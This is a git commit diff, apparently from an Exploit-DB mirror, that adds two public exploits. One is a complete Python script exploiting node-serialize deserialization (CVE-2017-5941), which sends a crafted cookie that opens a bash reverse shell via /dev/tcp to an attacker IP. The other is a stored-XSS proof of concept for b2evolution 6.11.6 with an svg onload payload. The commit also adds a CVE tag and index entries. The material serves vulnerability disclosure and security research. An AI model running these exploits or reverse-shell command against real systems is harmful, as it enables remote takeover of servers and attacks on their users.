DB: 2021-02-11
3 changes to exploits/shellcodes b2evolution 6.11.6 - 'plugin name' Stored XSS Node.JS - 'node-serialize' Remote Code Execution (2)
This commit is contained in:
parent
0ebed6d4c4
commit
fcdaf2028f
4 changed files with 57 additions and 0 deletions
36
exploits/nodejs/webapps/49552.py
Executable file
36
exploits/nodejs/webapps/49552.py
Executable file
|
@ -0,0 +1,36 @@
|
||||||
|
# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
|
||||||
|
# Exploit Author: UndeadLarva
|
||||||
|
# Software Link: https://www.npmjs.com/package/node-serialize
|
||||||
|
# Version: 0.0.4
|
||||||
|
# CVE: CVE-2017-5941
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import re
|
||||||
|
import base64
|
||||||
|
import sys
|
||||||
|
|
||||||
|
url = 'http://192.168.100.133:8000/' # change this
|
||||||
|
|
||||||
|
payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
|
||||||
|
"return function () {"
|
||||||
|
"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
|
||||||
|
"console.log('still inside');"
|
||||||
|
"const { exec } = require('child_process');"
|
||||||
|
"exec('bash -i >& /dev/tcp/192.168.200.5/445 0>&1');" # change this
|
||||||
|
"}"
|
||||||
|
"})(require('http').ServerResponse.prototype.end)")
|
||||||
|
|
||||||
|
# rce = "_$$ND_FUNC$$_process.exit(0)"
|
||||||
|
# code ="_$$ND_FUNC$$_console.log('behind you')"
|
||||||
|
code = "_$$ND_FUNC$$_" + payload
|
||||||
|
|
||||||
|
string = '{"username":"TheUndead","country":"worldwide","city":"Tyr", "exec": "'+code+'"}'
|
||||||
|
|
||||||
|
cookie = {'profile':base64.b64encode(string)}
|
||||||
|
|
||||||
|
try:
|
||||||
|
response = requests.get(url, cookies=cookie).text
|
||||||
|
print response
|
||||||
|
except requests.exceptions.RequestException as e:
|
||||||
|
print('Oops!')
|
||||||
|
sys.exit(1)
|
18
exploits/php/webapps/49551.txt
Normal file
18
exploits/php/webapps/49551.txt
Normal file
|
@ -0,0 +1,18 @@
|
||||||
|
# Exploit Title: b2evolution 6.11.6 - 'plugin name' Stored XSS
|
||||||
|
# Date: 09/02/2021
|
||||||
|
# Exploit Author: Soham Bakore, Nakul Ratti
|
||||||
|
# Vendor Homepage: https://b2evolution.net/
|
||||||
|
# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
|
||||||
|
# Version: 6.11.6
|
||||||
|
# Tested on: latest version of Chrome, Firefox on Windows and Linux
|
||||||
|
# CVE : CVE-2020-22841
|
||||||
|
|
||||||
|
|
||||||
|
--------------------------Proof of Concept-----------------------
|
||||||
|
|
||||||
|
1. Login with an account having high privileges
|
||||||
|
2. Navigate to System -> Plugins and select any plugin
|
||||||
|
3. Change the plugin name and enter the following payload "><svg/onload=alert(123)> in the name parameter
|
||||||
|
4. Payload gets stored in the database
|
||||||
|
5. The payload gets executed after the victim checks the plugin page.
|
||||||
|
6. This vulnerability needs high privilege and can affect other users with similar privileges
|
|
@ -6,6 +6,7 @@
|
||||||
# Software Link: https://download.millewin.it/files/Millewin/setup/InstMille_Demo_13.39_2019PS.exe
|
# Software Link: https://download.millewin.it/files/Millewin/setup/InstMille_Demo_13.39_2019PS.exe
|
||||||
# Version: 13.39.028 – 146.1.9
|
# Version: 13.39.028 – 146.1.9
|
||||||
# Tested on: Microsoft Windows 10 Enterprise x64
|
# Tested on: Microsoft Windows 10 Enterprise x64
|
||||||
|
# CVE: CVE-2021-3394
|
||||||
|
|
||||||
Millennium Millewin also known as "Cartella clinica"
|
Millennium Millewin also known as "Cartella clinica"
|
||||||
|
|
||||||
|
|
|
@ -43740,3 +43740,5 @@ id,file,description,date,author,type,platform,port
|
||||||
49545,exploits/php/webapps/49545.txt,"WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion",2021-02-08,"Erik David Martin",webapps,php,
|
49545,exploits/php/webapps/49545.txt,"WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion",2021-02-08,"Erik David Martin",webapps,php,
|
||||||
49546,exploits/php/webapps/49546.txt,"Online Car Rental System 1.0 - Stored Cross Site Scripting",2021-02-09,"Naved Shaikh",webapps,php,
|
49546,exploits/php/webapps/49546.txt,"Online Car Rental System 1.0 - Stored Cross Site Scripting",2021-02-09,"Naved Shaikh",webapps,php,
|
||||||
49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,
|
49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,
|
||||||
|
49551,exploits/php/webapps/49551.txt,"b2evolution 6.11.6 - 'plugin name' Stored XSS",2021-02-10,"Soham Bakore",webapps,php,
|
||||||
|
49552,exploits/nodejs/webapps/49552.py,"Node.JS - 'node-serialize' Remote Code Execution (2)",2021-02-10,UndeadLarva,webapps,nodejs,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue